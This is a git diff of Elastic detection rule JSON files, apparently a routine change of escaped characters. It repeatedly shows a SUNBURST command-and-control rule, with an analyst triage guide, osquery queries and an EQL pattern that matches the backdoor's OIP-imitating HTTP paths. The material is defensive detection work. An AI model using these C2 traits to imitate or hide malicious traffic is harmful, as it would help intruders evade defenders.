a/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_5.json +++ b/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_5.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -90,7 +90,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_102.json b/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_102.json index b99d04d39cc..207738b3763 100644 --- a/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_102.json +++ b/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_102.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -77,7 +77,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_103.json b/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_103.json index 5e227238575..98143a60398 100644 --- a/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_103.json +++ b/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_103.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -76,7 +76,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_104.json b/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_104.json index 9ae13941163..6481112224c 100644 --- a/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_104.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -77,7 +77,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_204.json b/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_204.json index 3ab4df605f8..5dc7d43e636 100644 --- a/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_204.json +++ b/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_204.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_104.json b/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_104.json index ed254e07f71..5d8afd013ed 100644 --- a/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_104.json +++ b/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_104.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "SUNBURST Command and Control Activity", - "note": "## Triage and analysis\n\n### Investigating SUNBURST Command and Control Activity\n\nSUNBURST is a trojanized version of a digitally signed SolarWinds Orion plugin called SolarWinds.Orion.Core.BusinessLayer.dll. The plugin contains a backdoor that communicates via HTTP to third-party servers. After an initial dormant period of up to two weeks, SUNBURST may retrieve and execute commands that instruct the backdoor to transfer files, execute files, profile the system, reboot the system, and disable system services. The malware's network traffic attempts to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol, and the malware stores persistent state data within legitimate plugin configuration files. The backdoor uses multiple obfuscated blocklists to identify processes, services, and drivers associated with forensic and anti-virus tools.\n\nMore details on SUNBURST can be found on the [Mandiant Report](https://www.mandiant.com/resources/sunburst-additional-technical-details).\n\nThis rule identifies suspicious network connections that attempt to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the environment at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Upgrade SolarWinds systems to the latest version to eradicate the chance of reinfection by abusing the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating SUNBURST Command and Control Activity\n\nSUNBURST is a trojanized version of a digitally signed SolarWinds Orion plugin called SolarWinds.Orion.Core.BusinessLayer.dll. The plugin contains a backdoor that communicates via HTTP to third-party servers. After an initial dormant period of up to two weeks, SUNBURST may retrieve and execute commands that instruct the backdoor to transfer files, execute files, profile the system, reboot the system, and disable system services. The malware's network traffic attempts to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol, and the malware stores persistent state data within legitimate plugin configuration files. The backdoor uses multiple obfuscated blocklists to identify processes, services, and drivers associated with forensic and anti-virus tools.\n\nMore details on SUNBURST can be found on the [Mandiant Report](https://www.mandiant.com/resources/sunburst-additional-technical-details).\n\nThis rule identifies suspicious network connections that attempt to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the environment at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Upgrade SolarWinds systems to the latest version to eradicate the chance of reinfection by abusing the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "network where host.os.type == \"windows\" and event.type == \"protocol\" and network.protocol == \"http\" and\n process.name : (\"ConfigurationWizard.exe\",\n \"NetFlowService.exe\",\n \"NetflowDatabaseMaintenance.exe\",\n \"SolarWinds.Administration.exe\",\n \"SolarWinds.BusinessLayerHost.exe\",\n \"SolarWinds.BusinessLayerHostx64.exe\",\n \"SolarWinds.Collector.Service.exe\",\n \"SolarwindsDiagnostics.exe\") and\n (\n (\n (http.request.body.content : \"*/swip/Upload.ashx*\" and http.request.body.content : (\"POST*\", \"PUT*\")) or\n (http.request.body.content : (\"*/swip/SystemDescription*\", \"*/swip/Events*\") and http.request.body.content : (\"GET*\", \"HEAD*\"))\n ) and\n not http.request.body.content : \"*solarwinds.com*\"\n )\n", "references": [ "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_105.json b/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_105.json index d375aa1d867..4ca6fa75975 100644 --- a/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_105.json +++ b/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_105.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "SUNBURST Command and Control Activity", - "note": "## Triage and analysis\n\n### Investigating SUNBURST Command and Control Activity\n\nSUNBURST is a trojanized version of a digitally signed SolarWinds Orion plugin called SolarWinds.Orion.Core.BusinessLayer.dll. The plugin contains a backdoor that communicates via HTTP to third-party servers. After an initial dormant period of up to two weeks, SUNBURST may retrieve and execute commands that instruct the backdoor to transfer files, execute files, profile the system, reboot the system, and disable system services. The malware's network traffic attempts to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol, and the malware stores persistent state data within legitimate plugin configuration files. The backdoor uses multiple obfuscated blocklists to identify processes, services, and drivers associated with forensic and anti-virus tools.\n\nMore details on SUNBURST can be found on the [Mandiant Report](https://www.mandiant.com/resources/sunburst-additional-technical-details).\n\nThis rule identifies suspicious network connections that attempt to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the environment at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Upgrade SolarWinds systems to the latest version to eradicate the chance of reinfection by abusing the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating SUNBURST Command and Control Activity\n\nSUNBURST is a trojanized version of a digitally signed SolarWinds Orion plugin called SolarWinds.Orion.Core.BusinessLayer.dll. The plugin contains a backdoor that communicates via HTTP to third-party servers. After an initial dormant period of up to two weeks, SUNBURST may retrieve and execute commands that instruct the backdoor to transfer files, execute files, profile the system, reboot the system, and disable system services. The malware's network traffic attempts to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol, and the malware stores persistent state data within legitimate plugin configuration files. The backdoor uses multiple obfuscated blocklists to identify processes, services, and drivers associated with forensic and anti-virus tools.\n\nMore details on SUNBURST can be found on the [Mandiant Report](https://www.mandiant.com/resources/sunburst-additional-technical-details).\n\nThis rule identifies suspicious network connections that attempt to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the environment at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Upgrade SolarWinds systems to the latest version to eradicate the chance of reinfection by abusing the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "network where host.os.type == \"windows\" and event.type == \"protocol\" and network.protocol == \"http\" and\n process.name : (\"ConfigurationWizard.exe\",\n \"NetFlowService.exe\",\n \"NetflowDatabaseMaintenance.exe\",\n \"SolarWinds.Administration.exe\",\n \"SolarWinds.BusinessLayerHost.exe\",\n \"SolarWinds.BusinessLayerHostx64.exe\",\n \"SolarWinds.Collector.Service.exe\",\n \"SolarwindsDiagnostics.exe\") and\n (\n (\n (http.request.body.content : \"*/swip/Upload.ashx*\" and http.request.body.content : (\"POST*\", \"PUT*\")) or\n (http.request.body.content : (\"*/swip/SystemDescription*\", \"*/swip/Events*\") and http.request.body.content : (\"GET*\", \"HEAD*\"))\n ) and\n not http.request.body.content : \"*solarwinds.com*\"\n )\n", "references": [ "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_106.json b/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_106.json index 820a2cb182c..6b40d7efa56 100644 --- a/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_106.json +++ b/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_106.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "SUNBURST Command and Control Activity", - "note": "## Triage and analysis\n\n### Investigating SUNBURST Command and Control Activity\n\nSUNBURST is a trojanized version of a digitally signed SolarWinds Orion plugin called SolarWinds.Orion.Core.BusinessLayer.dll. The plugin contains a backdoor that communicates via HTTP to third-party servers. After an initial dormant period of up to two weeks, SUNBURST may retrieve and execute commands that instruct the backdoor to transfer files, execute files, profile the system, reboot the system, and disable system services. The malware's network traffic attempts to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol, and the malware stores persistent state data within legitimate plugin configuration files. The backdoor uses multiple obfuscated blocklists to identify processes, services, and drivers associated with forensic and anti-virus tools.\n\nMore details on SUNBURST can be found on the [Mandiant Report](https://www.mandiant.com/resources/sunburst-additional-technical-details).\n\nThis rule identifies suspicious network connections that attempt to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the environment at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Upgrade SolarWinds systems to the latest version to eradicate the chance of reinfection by abusing the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating SUNBURST Command and Control Activity\n\nSUNBURST is a trojanized version of a digitally signed SolarWinds Orion plugin called SolarWinds.Orion.Core.BusinessLayer.dll. The plugin contains a backdoor that communicates via HTTP to third-party servers. After an initial dormant period of up to two weeks, SUNBURST may retrieve and execute commands that instruct the backdoor to transfer files, execute files, profile the system, reboot the system, and disable system services. The malware's network traffic attempts to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol, and the malware stores persistent state data within legitimate plugin configuration files. The backdoor uses multiple obfuscated blocklists to identify processes, services, and drivers associated with forensic and anti-virus tools.\n\nMore details on SUNBURST can be found on the [Mandiant Report](https://www.mandiant.com/resources/sunburst-additional-technical-details).\n\nThis rule identifies suspicious network connections that attempt to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the environment at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Upgrade SolarWinds systems to the latest version to eradicate the chance of reinfection by abusing the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "network where host.os.type == \"windows\" and event.type == \"protocol\" and network.protocol == \"http\" and\n process.name : (\"ConfigurationWizard.exe\",\n \"NetFlowService.exe\",\n \"NetflowDatabaseMaintenance.exe\",\n \"SolarWinds.Administration.exe\",\n \"SolarWinds.BusinessLayerHost.exe\",\n 